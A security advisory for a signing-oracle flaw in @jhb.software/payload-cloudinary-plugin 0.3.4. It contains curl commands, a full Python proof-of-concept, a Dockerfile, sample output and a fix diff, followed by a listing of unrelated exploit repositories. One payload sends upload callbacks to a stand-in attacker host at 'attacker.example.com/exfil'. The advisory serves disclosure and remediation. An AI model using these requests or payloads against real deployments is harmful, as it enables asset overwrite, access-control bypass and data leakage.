## Arbitrary Cloudinary API Parameter Signing in @jhb.software/payload-cloudinary-plugin ### Summary `@jhb.software/payload-cloudinary-plugin` v0.3.4 exposes a server-side signing endpoint (`POST /api/cloudinary-generate-signature`) that passes attacker-supplied `paramsToSign` directly to `cloudinary.utils.api_sign_request()` without any allowlist, key filtering, or policy enforcement. Any authenticated Payload user can obtain a cryptographically valid Cloudinary HMAC-SHA1 signature for arbitrary upload parameters — including `overwrite=true`, `type=private`, `notification_url`, and path-traversal folder values — enabling unauthorized asset replacement, access-control bypass, and potential SSRF within the configured Cloudinary account. ### Details When `clientUploads: true` is configured, the plugin registers a signing handler at `cloudinary/src/index.ts:74-79`. The handler is implemented in `cloudinary/src/getGenerateSignature.ts`. **Vulnerable code path (step by step):** 1. `cloudinary/src/index.ts:58` — `initClientUploads` registers the server upload handler. 2. `cloudinary/src/index.ts:68` — The Cloudinary API key is exposed to client handler props by design. 3. `cloudinary/src/index.ts:74-79` — The signing endpoint is mounted at `/cloudinary-generate-signature`. 4. `cloudinary/src/getGenerateSignature.ts:18` — The default access control checks only `!!req.user`, permitting any authenticated user. 5. `cloudinary/src/getGenerateSignature.ts:46` — The entire request body is parsed: `const body = await req.json?.()`. 6. `cloudinary/src/getGenerateSignature.ts:55` — **Vulnerable sink**: attacker-controlled `body.paramsToSign` is forwarded verbatim to the signing function. ```ts // cloudinary/src/getGenerateSignature.ts:46-55 const body = await req.json?.() if (!body?.paramsToSign) { return new Response(JSON.stringify({ error: 'No paramsToSign provided' }), ...) } // No allowlist, no key filtering, no folder/public_id/overwrite enforcement const signature = cloudinary.utils.api_sign_request(body.paramsToSign, apiSecret) ``` There are **no** mitigations in place: - No parameter key allowlist (attacker can include `overwrite`, `type`, `notification_url`, `invalidate`, etc.) - No folder/public_id policy enforcement (the plugin's `folder` option from `index.ts` is never passed to `getGenerateSignature`) - No timestamp freshness check - No restriction on path traversal sequences in `folder` or `public_id` Dynamic reproduction (Phase 2) confirmed all five attack scenarios with HTTP 200 and mathematically verified HMAC-SHA1 signatures: | Case | paramsToSign | Impact | |------|-------------|--------| | CASE-2 | `folder=attacker-controlled, overwrite=true` | Overwrite any existing asset | | CASE-3 | `type=private, public_id=admin-document` | Change asset visibility / bypass access control | | CASE-4 | `notification_url=http://attacker.example.com/exfil` | SSRF / data exfiltration via Cloudinary webhook | | CASE-5 | `folder=../../../../admin-assets, invalidate=true` | Path traversal + CDN cache invalidation | Python-independent signature recalculation matched server responses in all 5/5 cases, proving the server computes a genuine HMAC-SHA1 over attacker-controlled input. ### PoC **Prerequisites:** - `@jhb.software/payload-cloudinary-plugin@0.3.4` deployed with `clientUploads: true` - An authenticated Payload session (any privilege level) - Knowledge of `CLOUDINARY_CLOUD_NAME` and the client-exposed API key (exposed by design at `index.ts:68`) **Step 1 — Obtain a signature for arbitrary parameters (bash):** ```bash TS=$(date +%s) SIG=$(curl -s \ -H "Authorization: Bearer <LOW_PRIV_TOKEN>" \ -H "Content-Type: application/json" \ -X POST "http://localhost:3000/api/cloudinary-generate-signature?collectionSlug=media" \ --data "{\"paramsToSign\":{\"timestamp\":\"$TS\",\"folder\":\"attacker\",\"public_id\":\"overwrite-target\",\"overwrite\":\"true\"}}" \ | jq -r .signature) echo "Obtained signature: $SIG" ``` **Step 2 — Use the minted signature to upload directly to Cloudinary:** ```bash curl -s -X POST "https://api.cloudinary.com/v1_1/$CLOUDINARY_CLOUD_NAME/auto/upload" \ -F "file=@poc.txt" \ -F "api_key=$CLOUDINARY_API_KEY" \ -F "timestamp=$TS" \ -F "folder=attacker" \ -F "public_id=overwrite-target" \ -F "overwrite=true" \ -F "signature=$SIG" ``` **Expected result:** Cloudinary returns a successful upload JSON for `attacker/overwrite-target` — an asset path the plugin never intended to authorize. **Automated PoC (Python):** ```bash # Build and run the reproduction container docker build -t vuln-002-cloudinary . docker run -d --name vuln-002 -p 3000:3000 vuln-002-cloudinary # Run all five attack scenarios python3 poc.py --server http://127.0.0.1:3000 ``` The script (`poc.py`) posts five distinct `paramsToSign` payloads and independently verifies each returned signature using `hashlib.sha1`. All five cases return HTTP 200 with a mathematically valid signature, confirming the vulnerability. **Sample output (Phase 2 evidence):** ``` [SIGN] paramsToSign={"timestamp":"...","folder":"attacker-controlled","public_id":"overwrite-target","overwrite":"true"} => abc45ef5f0807bdef153074d2be3e713ea867168 (HTTP 200) [SIGN] paramsToSign={"timestamp":"...","type":"private","public_id":"admin-document"} => 0d8102a5ff48953832b76a1f21d1c513af5940e1 (HTTP 200) [SIGN] paramsToSign={"timestamp":"...","folder":"media","notification_url":"http://attacker.example.com/exfil"} => 72d954c67bd4a38d6a3931c64511f84143d24685 (HTTP 200) [SIGN] paramsToSign={"timestamp":"...","folder":"../../../../admin-assets","public_id":"../../../sensitive","invalidate":"true"} => d44984e7af8fca306e59e00810c2623d8963e011 (HTTP 200) Results: 5/5 cases confirmed — HTTP 200 + mathematically valid HMAC-SHA1 on every attacker-controlled paramsToSign ``` **Recommended fix:** ```diff --- a/cloudinary/src/getGenerateSignature.ts +++ b/cloudinary/src/getGenerateSignature.ts @@ type Args = { apiSecret: string + folder?: string } @@ export const getGenerateSignature = - ({ access = defaultAccess, apiSecret }: Args): PayloadHandler => + ({ access = defaultAccess, apiSecret, folder }: Args): PayloadHandler => @@ - const signature = cloudinary.utils.api_sign_request(body.paramsToSign, apiSecret) + const paramsToSign = body.paramsToSign as Record<string, unknown> + const allowedKeys = new Set(['timestamp', 'folder', 'public_id']) + if ( + !paramsToSign || + Object.keys(paramsToSign).some((key) => !allowedKeys.has(key)) || + typeof paramsToSign.timestamp !== 'string' + ) { + throw new Forbidden() + } + if (folder && paramsToSign.folder !== folder.replace(/^\/|\/$/g, '')) { + throw new Forbidden() + } + if ( + typeof paramsToSign.public_id === 'string' && + (paramsToSign.public_id.includes('..') || paramsToSign.public_id.startsWith('/')) + ) { + throw new Forbidden() + } + const signature = cloudinary.utils.api_sign_request(paramsToSign, apiSecret) ``` ### Impact This is an **Improper Verification of Cryptographic Signature** vulnerability (CWE-347). The signing endpoint is intended to authorize legitimate client-side uploads, but because `paramsToSign` is never validated, it acts as an unrestricted signature oracle for any authenticated user. **Who is impacted:** All deployments of `@jhb.software/payload-cloudinary-plugin` that set `clientUploads: true`. This is a non-default but officially recommended production configuration for Vercel deployments (documented in the plugin README). **Concrete attack outcomes:** - **Asset overwrite** (`overwrite=true`): attacker replaces any existing media asset in the Cloudinary account, enabling content tampering or defacement. - **Access-control bypass** (`type=private`): attacker changes the delivery type of uploaded assets, potentially exposing or hiding content beyond what the application intends. - **SSRF / data exfiltration** (`notification_url`): Cloudinary issues an HTTP callback to the attacker-controlled URL upon upload completion, leaking upload metadata and enabling server-side request forgery. - **Path traversal** (`folder=../../../../...`, `invalidate=true`): attacker writes to or invalidates assets in arbitrary Cloudinary folders, including administrative paths outside the configured upload directory. The Cloudinary API key is exposed to the client by the plugin itself (`index.ts:68`), so an attacker already holds three of the four required upload components (cloud name, API key, timestamp). The signing endpoint provides the missing fourth (signature), completing the attack chain with a single authenticated request. ### Reproduction artifacts #### `Dockerfile` ```dockerfile FROM node:22-alpine LABEL description="VULN-002 reproduction: arbitrary Cloudinary API parameter signing" \ vuln="getGenerateSignature.ts:55 - body.paramsToSign signed without allowlist" \ package="@jhb.software/payload-cloudinary-plugin@0.3.4" WORKDIR /app # Install exactly the cloudinary version declared in the plugin's package.json RUN echo '{"name":"vuln-002-server","version":"1.0.0","private":true}' > package.json && \ npm install cloudinary@2.10.0 --save --no-audit --no-fund COPY server.js . EXPOSE 3000 # Start the minimal reproduction server CMD ["node", "server.js"] ``` #### `poc.py` ```python #!/usr/bin/env python3 """ PoC for VULN-002: Arbitrary Cloudinary API Parameter Signing Package : @jhb.software/payload-cloudinary-plugin v0.3.4 File : cloudinary/src/getGenerateSignature.ts:55 CWE : CWE-347 — Improper Verification of Cryptographic Signature CVSS : 7.1 (High) AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L Vulnerable sink (exact line from source): const signature = cloudinary.utils.api_sign_request(body.paramsToSign, apiSecret) body.paramsToSign is passed directly with no allowlist, no key filtering, and no folder/public_id/overwrite enforcement. Any authenticated user can obtain a valid Cloudinary HMAC-SHA1 signature for arbitrary upload parameters. Usage: python3 poc.py [--server http://127.0.0.1:3000] """ import argparse import hashlib import json import sys import time import urllib.error import urllib.request # Must match API_SECRET in server.js API_SECRET = "poc-fake-api-secret-12345" # Simulates a low-privilege authenticated user session AUTH_HEADER = "Bearer low-privilege-user-token" GREEN = "\033[32m" RED = "\033[31m" YELLOW = "\033[33m" RESET = "\033[0m" # --------------------------------------------------------------------------- # Cloudinary signature algorithm — Python re-implementation of # cloudinary.utils.api_sign_request(params, api_secret) # Algorithm: SHA-1( sorted_k=v_pairs + api_secret ) # --------------------------------------------------------------------------- def cloudinary_sign(params: dict, api_secret: str) -> str: """Return the expected Cloudinary HMAC-SHA1 signature for params.""" filtered = {k: v for k, v in params.items() if v not in (None, "")} sorted_pairs = sorted(filtered.items()) param_str = "&".join(f"{k}={v}" for k, v in sorted_pairs) to_sign = param_str + api_secret return hashlib.sha1(to_sign.encode("utf-8")).hexdigest() # --------------------------------------------------------------------------- # HTTP helpers # --------------------------------------------------------------------------- def post_sign(server: str, params: dict) -> tuple[int, dict]: """ POST {"paramsToSign": params} to the signing endpoint. Returns (http_status, response_dict). Raises urllib.error.HTTPError for 4xx/5xx. """ body = json.dumps({"paramsToSign": params}).encode("utf-8") req = urllib.request.Request( f"{server}/api/cloudinary-generate-signature?collectionSlug=media", data=body, headers={ "Content-Type": "application/json", "Authorization": AUTH_HEADER, }, method="POST", ) with urllib.request.urlopen(req, timeout=10) as resp: return resp.status, json.loads(resp.read()) # --------------------------------------------------------------------------- # Test runner # --------------------------------------------------------------------------- def run_case(server: str, label: str, params: dict) -> bool: """ Execute one signing test case and verify: 1. HTTP 200 is returned (endpoint did NOT reject the params). 2. The returned signature is mathematically correct. Returns True if both conditions hold (vulnerability confirmed for this case). """ print(f"\n [{label}]") print(f" paramsToSign : {json.dumps(params)}") try: status, data = post_sign(server, params) except urllib.error.HTTPError as exc: body = exc.read().decode(errors="replace") print(f" HTTP {exc.code} — request rejected: {body}") print(f" {RED}UNEXPECTED REJECTION{RESET} — allowlist may be present for this case") return False except Exception as exc: print(f" Connection error: {exc}") return False sig_returned = data.get("signature", "") sig_expected = cloudinary_sign(params, API_SECRET) sig_match = sig_returned == sig_expected print(f" HTTP status : {status}") print(f" Signature : {sig_returned}") print(f" Expected sig : {sig_expected}") print(f" Sig valid : {'YES — mathematically correct HMAC-SHA1' if sig_match else 'NO — mismatch'}") if status == 200 and sig_match: print(f" {GREEN}CONFIRMED{RESET} — endpoint signed arbitrary params without rejection") return True else: print(f" {RED}UNEXPECTED{RESET} — status={status}, sig_match={sig_match}") return False # --------------------------------------------------------------------------- # Main # --------------------------------------------------------------------------- def main(): parser = argparse.ArgumentParser(description="VULN-002 PoC") parser.add_argument("--server", default="http://127.0.0.1:3000", help="Target server URL") args = parser.parse_args() server = args.server.rstrip("/") ts = str(int(time.time())) print("=" * 70) print("VULN-002 PoC — Arbitrary Cloudinary API Parameter Signing") print(f"Target : {server}") print(f"Vuln : getGenerateSignature.ts:55 — no paramsToSign allowlist") print(f"Auth : {AUTH_HEADER!r} (low-privilege user simulation)") print("=" * 70) # ------------------------------------------------------------------ # Attack scenarios # ------------------------------------------------------------------ # Each case passes paramsToSign that the plugin should REJECT but does NOT. # A correctly patched implementation would return 4xx for cases 2-5. # ------------------------------------------------------------------ cases = [ ( "CASE-1: Legitimate params (baseline — should always succeed)", {"timestamp": ts, "folder": "media", "public_id": "user-upload"}, ), ( "CASE-2: Attacker-controlled folder + overwrite=true", { "timestamp": ts, "folder": "attacker-controlled", "public_id": "overwrite-target", "overwrite": "true", }, ), ( "CASE-3: type=private — changes upload visibility", { "timestamp": ts, "type": "private", "public_id": "admin-document", }, ), ( "CASE-4: notification_url — potential SSRF / data exfiltration", { "timestamp": ts, "folder": "media", "notification_url": "http://attacker.example.com/exfil", }, ), ( "CASE-5: folder path traversal + invalidate=true", { "timestamp": ts, "folder": "../../../../admin-assets", "public_id": "../../../sensitive", "invalidate": "true", }, ), ] results = [] for label, params in cases: results.append(run_case(server, label, params)) passed = sum(results) total = len(results) print("\n" + "=" * 70) print(f"Results : {passed}/{total} cases confirmed") # Cases 1-5 all passing means the vulnerability is proven: # the endpoint signs ANY paramsToSign regardless of content. if all(results): print(f"\n{GREEN}VERDICT: PASS — VULN-002 CONFIRMED{RESET}") print( "All 5 attack scenarios returned HTTP 200 with a mathematically valid" " Cloudinary HMAC-SHA1 signature." ) print( "The plugin endpoint signs arbitrary upload parameters without any" " allowlist, folder enforcement, or overwrite/type restriction." ) print( "Impact: any authenticated Payload user can mint valid Cloudinary" " signatures for arbitrary parameters, enabling asset replacement," " privacy changes, and potential SSRF via notification_url." ) sys.exit(0) elif results[0]: failed = [cases[i][0] for i, r in enumerate(results) if not r] print(f"\n{YELLOW}VERDICT: PARTIAL — baseline succeeded but some cases failed{RESET}") print(f"Failed cases: {failed}") sys.exit(2) else: print(f"\n{RED}VERDICT: FAIL — server not reachable or baseline request failed{RESET}") sys.exit(1) if __name__ == "__main__": main() ```
PoC: mikrotrick-poc
CVE-2026-67276 RouterOS SSH public-key authentication bypass lab PoC
PoC: xiaomi15-dada-cve-2026-64560
Device-bound CVE-2026-64560 adaptation for Xiaomi 15 dada OS4.0.0.8
PoC: cve-2026-32475-elementor-pro-lab
A/B Docker lab + PoC for CVE-2026-32475 (Elementor Pro Forms unauthenticated arbitrary file upload -> RCE via validation/move loop desync)
PoC: KeySniper
**CVE-2026-18963** — unauthenticated Keycloak account takeover via the reset-credentials flow.
PoC: CVE-2026-58138
CVE-2026-58138
PoC: CVE-2026-41940
cPanel & WHM - Authentication Bypass via Session-File CRLF Injection
PoC: CVE-2024-12356
Unauthenticated RCE detector + RCA for BeyondTrust Remote Support / PRA (CVE-2024-12356 + CVE-2025-1094)
PoC: CVE-2026-85046
CVE-2026-85046
PoC: gha-lab-733c168b88
Authorized security-research lab reproducing CVE-2026-44246 (GHSA-63mx-j37w-gh59): prompt injection via verbatim issue title/body inlining into the claude-code-action triage agent in nnU-Net's issue-triage workflow. Snapshot of MIC-DKFZ/nnUNet @ 9a1db0dd1c74894fa17e79014be4097f546a51be.
PoC: gha-lab-677752506e
Authorized security-research lab reproducing CVE-2026-42298 (pull_request_target docker-build RCE in pr-docker-build.yml) — flattened snapshot of gitroomhq/postiz-app
PoC: CVE-2026-42559
Docker lab + Python PoC for CVE-2026-42559 - DNS rebinding via unvalidated Host header in the rmcp (Rust MCP SDK) Streamable HTTP server transport
PoC: CVE-2024-7804
Docker lab + Python exploit for CVE-2024-7804 (PyTorch torch.distributed.rpc unsafe pickle deserialization RCE, CWE-502, torch <= 2.3.1)
PoC: gha-lab-456dd8a245
Security-research lab reproducing CVE-2026-41414 (pull_request_target pwn in .github/workflows/pr.yml) — snapshot of skim-rs/skim @ ca986f4, not a fork.
PoC: gha-lab-5bce203f66
Security-research lab: reproduction of CVE-2026-41249 (GHSA-q58j-g3f4-h26h) — pull_request_target pwn request in .github/workflows/static.yml, snapshot of coreshop/CoreShop@cc1e3f54
PoC: CVE-2025-57819
CVE-2025-57819 - FreePBX 16 Endpoint Manager unauthenticated SQL injection to RCE (PoC)
PoC: gha-lab-360f77d0d4
Authorized security-research lab: reproduction of CVE-2026-39866 (GHSA-9prc-pp2c-3427) — workflow_dispatch input template injection in .github/workflows/release_update.yml of LawnchairLauncher/lawnchair @ b089bae8c007f36a8ce0346725182a107d97cd05. Snapshot pinned to the vulnerable commit; owner-gated sign-info step retargeted for the lab.
PoC: CVE-2026-44578-next-js-ssrf
este laboratorio puede estar bien o mal esta el pruebas pero debe funcionar preguntale a la IA hahah
PoC: log4shell-exploitation-lab
CVE-2021-44228 Log4Shell reproduced end to end: exploitation through remediation
PoC: GitLab-CVE-2023-7028
A mock app for the GitLab CVE-2023-7028, which allow multile email adresses when ordering a password reset.
PoC: CVE-2026-64849-poc-lab
este laboratorio puede estar bien o mal preguntale a la IA estoy probando pero debe funcionar hahahah
PoC: CVE-2021-3030
Advisory: Cute Editor 6.4 reflected XSS via 'Theme' parameter in colorpicker_more.aspx
PoC: CVE-2026-27876
Grafana SQL Expressions Arbitrary File Write to RCE
PoC: CVE-2026-28956-jxl-messages-surface
JPEG XL auto-decodes in the iOS Messages preview path — delivery-surface finding for CVE-2026-28956 (AppleJPEGXL), with patch-diff attribution (libjxl 0.10.4->0.10.5) and an honest reliability check on the public PoC.
PoC: CVE-2026-73570
Zimbra Collaboration Suite RCE — SMTP log poisoning → swatchdog → OS Command Injection (CVSS 8.9, CISA KEV)
PoC: CVE-2020-10770-keycloak-exploit-poc
Keycloak Blind SSRF POC
PoC: CVE-2026-1529-Keycloak-Exploit-Tool
Keycloak: Unauthorized organization registration via improper invitation token validation
PoC: CVE-2026-18963-keycloak
CVE-2026-18963 — Keycloak reset-credentials bypass -> Account Takeover
PoC: CVE-2026-64747
Root cause + macOS reachability PoC for CVE-2026-64747 (AppleAVE2 kext buffer overflow, fixed 26.6 / 905.40.1). Fully reversed AppleAVE2UserClient wire protocol, mode-5 LRB overflow math, IOKit PoC driving the configure path.
PoC: CVE-2026-64705
Root cause + PoC for CVE-2026-64705 (macOS HFS xattr kernel heap overflow, fixed 14.8.7). Weaponized HFS+ image: unbounded bcopy loop -> kernel heap overflow -> panic on pre-fix systems; validator rejection on patched. Kext diff, mechanism, rebuild recipe.
PoC: CVE-2026-78938
Root cause analysis + working R/W exploit for CVE-2026-78938 (V8 TurboFan CheckMaps instance-migration type confusion, Chrome 152, exploited in the wild). Crash PoC + addrof/fakeobj/arbitrary R/W over the compressed heap.
PoC: Jozini-network-scanner
# Jozini Network Scanner Built in Termux at KwaQondile Library, Jozini KZN Tools: - scanner.py: Port scanner with banner grabbing (20 ports + report saving) - cve_check.py: Maps RouterOS version to known CVEs Finding: MikroTik RouterOS 6.46.8 vulnerable to CVE-2020-2021 (Critical) Author: [Your Name] - Aspiring Pentester
PoC: CVE-2026-52774-YESWIKI-XSS
a reflected XSS vulnerability in YesWiki's Bazar widget handler.
PoC: netty-http2-check
CVE-2025-55163 / CVE-2026-56819: offline checker for the 7 netty-codec-http2 CVEs. Tells you which ones you are exposed to, and the one version that fixes all seven (4.1.136.Final / 4.2.16.Final) - written on none of the advisories. Does not scan pom.xml on purpose: WebFlux pulls it in transitively.
PoC: CVE-2026-0920
A PoC exploit for CVE-2026-0920 - LA-Studio Element Kit / Unauthenticated Privilege Escalation
PoC: CVE-2026-84645
Jenkins PersistenceRoot Deserialization RCE (SECURITY-3972) — PoC & analysis. Requires Item/Configure; affects weekly <= 2.579 / LTS <= 2.568.2
PoC: cyberthreat_DBSproject
threat = { "id": "CVE-2026-0001", "title": "Apache HTTP Server Remote Code Execution", "vendor": "Apache", "product": "HTTP Server", "description": "A vulnerability in Apache HTTP Server allows remote attackers to execute arbitrary code.", "cvss": 9.8, "kev": True, "published": "2026-06-30" }
PoC: CVE-2026-6471
CVE-2026-6471
PoC: CVE-2026-75865
Unauthenticated arbitrary file upload -> RCE in WPLP Cookie Consent (gdpr-cookie-consent) <= 4.4.1 - technical write-up and PoC
PoC: CVE-2026-32475
CVE-2026-32475 PoC : Elementor Pro Unauthenticated Arbitrary File Upload to RCE
PoC: CVE-2023-42793-TeamCity-Unauthenticated-RCE
A PoC and automated version detection/exploit tool for JetBrains TeamCity Authentication Bypass & RCE (CVE-2023-42793).
PoC: cve-2026-6471-postgres-logical-decoding-dlopen
postgres CVE-2026-6471 Exploit
PoC: gpgsm-cve-2026-57062-cms-gcm-short-tag
gpgsm CVE-2026-57062 exploit POC
PoC: CVE-2025-4255---Buffer-Overflow
Exploit Framework for CVE-2025-4255
PoC: gha-lab-4a8fad8536
Security-research lab reproducing CVE-2026-39382 (GHSA-5jxf-vmqr-5g82): command injection in dbt-labs reusable workflow open-issue-in-repo.yml, driven by a dbt-core-style docs-issue.yml caller
PoC: gha-lab-ed7a1740c4
Security-research lab: controlled reproduction of GHSA-3g6g-gq4r-xjm9 / CVE-2026-35580 (GitHub Actions workflow_dispatch input shell injection) against a pinned snapshot of NationalSecurityAgency/emissary
PoC: gha-lab-85f022290a
Research lab reproduction of CVE-2026-34243 (GHSA-r4fj-r33x-8v88): command injection via issue_comment.body in .github/workflows/comment.yaml — snapshot of njzjz/wenxian@ca4e04de86aa970c0e3cb1c7f2bd103d339fbe51
PoC: gha-lab-9b5e3ccfbe
Security-research lab: reproduction of CVE-2026-33475 (GitHub Actions script injection via PR branch name in deploy-docs-draft.yml), snapshot of langflow-ai/langflow
PoC: research-cve-2026-85649
[MIRROR] The CVE-2026-85649 Security Research Publication.
PoC: gha-lab-61c59f4acb
Security-research lab: controlled reproduction of CVE-2026-33075 (pwn request in labring/FastGPT preview-image workflow, pull_request_target + checkout-of-fork + privileged buildx push)
PoC: gha-lab-3f1ff30e9c
Authorized security-research lab reproducing CVE-2026-31852 (jellyfin/jellyfin-ios pull_request_target pwn in code-quality.yml) — isolated snapshot, not the upstream project
PoC: gha-lab-ca4fa82ac5
Security-research lab: reproduction of CVE-2026-29075 (GHSA-3j55-5q6x-2h48) in mesa/mesa benchmarks.yml pull_request_target workflow — single-commit snapshot for authorized vulnerability reproduction.
PoC: gha-lab-6c3094af9e
Authorized security-research lab reproducing CVE-2026-27941 (pwn request in pull_request_target workflows) — snapshot of openlit/openlit
PoC: gha-lab-a7f6217d26
Security-research reproduction of CVE-2026-27938 / GHSA-4q9f-mjxf-rx7x (GitHub Actions expression injection in release workflows) — snapshot of wp-graphql/wp-graphql at b216fe22f3a119f256511ec7353f536fee6886ac
PoC: cve-2026-19900-PoC
cve-2026-19900-PoC
PoC: CVE-2026-85769
Heap out-of-bounds read in libtpms TPM 2.0 state deserialization — CVE-2026-85769
PoC: CVE-2026-19632
Unauthenticated account takeover PoC for TranslatePress Multilingual <= 3.3.1 (WordPress)
PoC: CVE-2026-11613
Divi Ajax Filter <= 5.1.2 Unauthenticated Local File Inclusion via 'custom_loop_template'
PoC: gha-lab-25b7988758
Authorized security-research reproduction of CVE-2026-27701 / GHSA-xh9w-5859-x97j (live-codes/livecodes @ 8017e01): untrusted PR title interpolated into i18n-update-pull github-script block.
PoC: copy-fail-CVE-2026-31431-cpp
https://github.com/theori-io/copy-fail-CVE-2026-31431 but ported to c++ for fun
PoC: CVE-2026-83548-checker
Non-intrusive detector for SonicWall SMA 1000 exposure to CVE-2026-83548/-83549 (version/patch-state check; no exploitation)
PoC: gha-lab-b16a4f3554
Security-research lab: CVE-2026-24480 pull_request_target pre-commit RCE in qgis/QGIS (snapshot at vulnerable commit)
PoC: Yordam-Kutuphane-Otomasyonunda-Coklu-HTML-Enjeksiyonu
CVE-2026-77818 - Yordam Kütüphane Otomasyon Sistemi - Üç ayrı noktada yansıtılmış HTML enjeksiyonu, form action ele geçirme ve kimlik bilgisi hırsızlığı (CWE-79)
PoC: jsherp-user-info-idor
VulDB advisory: jshERP authenticated /user/info IDOR and password-digest replay after CVE-2025-60800
PoC: gha-lab-7927d7d06f
Security-research lab reproducing CVE-2026-22869 (pwn) — arbitrary code execution in privileged pull_request_target run via npx local-bin hijack, snapshot of eigent-ai/eigent @ 2a406536
PoC: cve-2026-31431
PoC for CVE-2026-31431
PoC: gha-lab-b5c1313658
Authorized security-research lab reproducing CVE-2026-1699 (pwn request in preview.yml) — snapshot of eclipse-theia/theia-website
PoC: CVE-2026-63077
CVE-2026-63077 - Unauthenticated RCE exploit for JetBrains TeamCity via Agent Polling Deserialization. Supports mass scanning, multi-threading, and interactive shell. For authorized security testing only.
PoC: CVE-2026-6471
CVE-2026-6471 - Draft or TODO
PoC: CVE-2026-73554
CVE-2026-73554 - Draft or TODO
PoC: CVE-2026-19516
CVE-2026-19516
PoC: gha-lab-51c6b6d0a0
Lab reproducing CVE-2025-67727 (parse-community/parse-server ci-performance.yml pull_request_target RCE at e78e58d) — authorized security research
PoC: gha-lab-6904b2ccbe
Security-research lab: reproduction of CVE-2025-61584 (GHSA-9g7x-737f-5xpc) — command injection via github.head_ref in pull_request_target workflow (.github/workflows/pr.yml)
PoC: CVE-2026-85046-Patch-confusion-zero-day-vulnerability-in-Google-Chrome-s-V8-engine
Conceptual C++ patch and structural analysis for CVE-2026-85046, a critical type confusion zero-day vulnerability in Google Chrome's V8 engine
PoC: cve-disclosures
CVE-2024-57551, CVE-2024-57552, CVE-2024-57553 advisories by Aman Bahiniya
PoC: unit-01-severity-vs-risk-reflection
cve-2026-25524 Holds no customer payment data, no monitoring in place, monitored 24/7 The CVSS score is technically serious, but it doesn't tell how exposed it is, weather our existing defenses would stop or contain an attack. We should confirm the vulnerable component is reachable by untrust input in our environment.
PoC: gha-lab-d14c91f1bb
Security-research lab: reproduction of CVE-2025-58371 (GitHub Actions command injection via PR title in Discord PR Notifier), snapshot of RooCodeInc/Roo-Code @ 08a825f9bb0086a88cff5a79b9af4731bba7d076
PoC: thymeleaf-check
Offline checker for Thymeleaf CVE-2026-40477 / CVE-2026-41901 — tells you which of the two CVSS 9.0 SSTI flaws you are exposed to, and whether your version line has a fix at all (3.0.x: it does not)
PoC: CVE-2024-36058
CVE-2024-36058 — Authenticated Time-Based Blind SQL Injection in Koha Library Software < 22.05.22 (opac-sendbasket.pl). Advisory + PoC by Hacklantic.
PoC: CVE-2024-36057
CVE-2024-36057 — Authenticated OS Command Injection in Koha Library Software < 22.05.22 (upload-cover-image.pl). Advisory + PoC by Hacklantic.
PoC: gha-lab-aa1cbc9bcf
Authorized security-research reproduction of CVE-2025-54594 (GHSA-588g-38p4-gr6x): privileged issue_comment-triggered canary release workflow checking out untrusted fork code and running its npm scripts with GITHUB_TOKEN/NPM_TOKEN in env. Snapshot of callstackincubator/react-native-bottom-tabs @ d765b1f695762490327dcb8f6a2f17542cf0abdb.
PoC: CVE-2026-82329-poc
CVE-2026-82329 Poc
PoC: CVE-2025-34158-CVE-2020-5741
CVE-2025-34158, CVE-2020-5741 - Draft or TODO
PoC: gha-lab-ba981941f0
Security-research lab reproducing CVE-2025-54430 (GHSA-wrg3-xqw8-m85p): secrets exfiltration via issue_comment-triggered Benchmark Bot in dedupeio/dedupe. Snapshot of dedupeio/dedupe@54ecfe77d41390da66899596834a2bde3712c966.
PoC: gha-lab-f894926966
Authorized security-research reproduction lab for CVE-2025-54415 (GHSA-g5hx-xv45-9whg): astronomer/dag-factory snapshot at 464c75a — pull_request_target head-SHA checkout executes attacker-controlled hatch scripts in base-repo context
PoC: gha-lab-6926364d94
Security research lab reproducing CVE-2025-53546 (GHSA-h87r-5w74-qfm4): pull_request_target arbitrary code execution in RSSNext/Folo's auto-fix lint workflow — authorized, isolated reproduction
PoC: CVE-2025-8518
CVE-2025-8518 - Draft or TODO
PoC: gha-lab-3b0a828a69
Security-research lab reproducing CVE-2025-53104 (GHSA-432r-9455-7f9x): command injection in discussion-to-slack.yml of gluestack/gluestack-ui
PoC: gha-lab-e8902eccd3
Security research lab: reproduction of CVE-2025-52467 (pgai pull_request_target workflow code execution / GITHUB_TOKEN exfiltration) — snapshot of timescale/pgai
PoC: tomcatfileread
CVE-2020-1938 (Ghostcat) Tomcat AJP file read/file include PoC with python3 port
PoC: CVE-Chamilo-LMS
CVE-2026-61578, CVE-2026-61582, CVE-2026-61583, CVE-2026-61584, CVE-2026-61585, CVE-2026-61587, CVE-2026-61600, CVE-2026-61601, CVE-2026-61602, CVE-2026-70647, CVE-2026-70648 - Draft or TODO
PoC: gha-lab-2f775f277c
Authorized lab reproduction of CVE-2025-47928 (spotipy-dev/spotipy pull_request_target secrets exfiltration) — snapshot at vulnerable commit 4f5759d
PoC: CVE-2026-31787
Linux kernel double free in Xen privcmd driver
PoC: gha-lab-fb6df3d456
Authorized security-research lab reproducing CVE-2025-46820 (GHSA-cwj7-6v67-2cm4): GITHUB_TOKEN persisted into publicly downloadable CI artifacts in phpgt/Dom. Snapshot of phpgt/Dom @ b73d7e8.
PoC: CVE-2026-20212
CVE-2026-20212 - Draft or TODO
PoC: CVE-2026-56718
AJCloud AJY IPC Firmware Path Traversal via jdbhttpd
PoC: psa-2026-00043-recovery
Recovery notes for proxmox advisory ID: PSA-2026-00043-1 (CVE-2023-54391)
PoC: gha-lab-ba8e0c4217
Authorized security-research lab: reproduction of CVE-2024-42370 / GHSA-4hq2-rpgc-r8r7 (env injection in docs-preview.yml) — snapshot of litestar-org/litestar@18d84d84
PoC: CVE-2026-65643-PoC-Toolkit
🧰 CVE-2026-65643 – cPanel Domain Parking RCE Toolkit (CVSS 8.7) | Red/Blue Team suite for unpatched cPanel & WHM 11.x (110,134,136,138). 2 tools: Full Exploit (reverse shell, webshell, persistence, root passwd, file R/W, mass scan, Tor), Blue Team PoC (detection, reporting, audit). w/Python. 🦾 Only Use Ethically, Stay Legal <3
PoC: CVE-2026-4813
PoC for CVE-2026-4813
PoC: cve-2026-75604
Research lab and exploit chain for CVE-2026-75604: path traversal in the Next.js incremental cache, to RCE on Windows.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
Get alerted for CVEs like this
Register your stack and get notified within minutes when a matching CVE drops.
Start monitoring free